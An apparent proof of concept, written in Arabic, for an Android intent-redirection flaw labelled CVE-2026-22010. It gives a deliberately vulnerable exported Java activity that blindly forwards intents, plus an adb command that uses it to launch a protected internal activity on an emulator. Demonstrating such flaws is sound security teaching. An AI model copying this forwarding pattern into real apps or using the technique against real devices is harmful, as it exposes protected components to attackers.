
إثبات مفهوم لثغرة CVE-2026-22010 الخاصة بإعادة توجيه Intent في أندرويد: يوضح نشاطًا مُصدَّرًا يعيد توجيه الـ Intents إلى مكونات داخلية يتحكم فيها المهاجم، متجاوزًا فحوصات الأذونات، مع كود Java هش وخطوات استغلال عبر adb.
// VulnActivity.java - Exported activity that forwards intents
public class VulnActivity extends Activity {
@Override
protected void onCreate(Bundle b) {
super.onCreate(b);
Intent incoming = getIntent();
// Retrieve target component from extras
String targetPkg = incoming.getStringExtra("pkg");
String targetCls = incoming.getStringExtra("cls");
Intent forward = new Intent();
forward.setClassName(targetPkg, targetCls);
// Copy all extras from original intent
forward.putExtras(incoming);
startActivity(forward);
}
}
نشاط Android مُصدَّر يعيد توجيه الـ Intent الواردة بشكل أعمى إلى مكوّن محدد في extras الخاصة بالـ Intent. يمكن للمهاجم صياغة Intent تؤدي إلى قيام التطبيق بتشغيل نشاط داخلي محمي ببيانات يتحكم بها المهاجم، متجاوزًا فحوصات الأذونات.
انشر التطبيق المعرّض للثغرة على محاكي Android. أرسِل Intent عبر adb:
adb shell am start -n com.example/.VulnActivity --es pkg com.example.internal --es cls com.example.SecretActivity
يتم تشغيل النشاط الداخلي دون الأذونات المناسبة.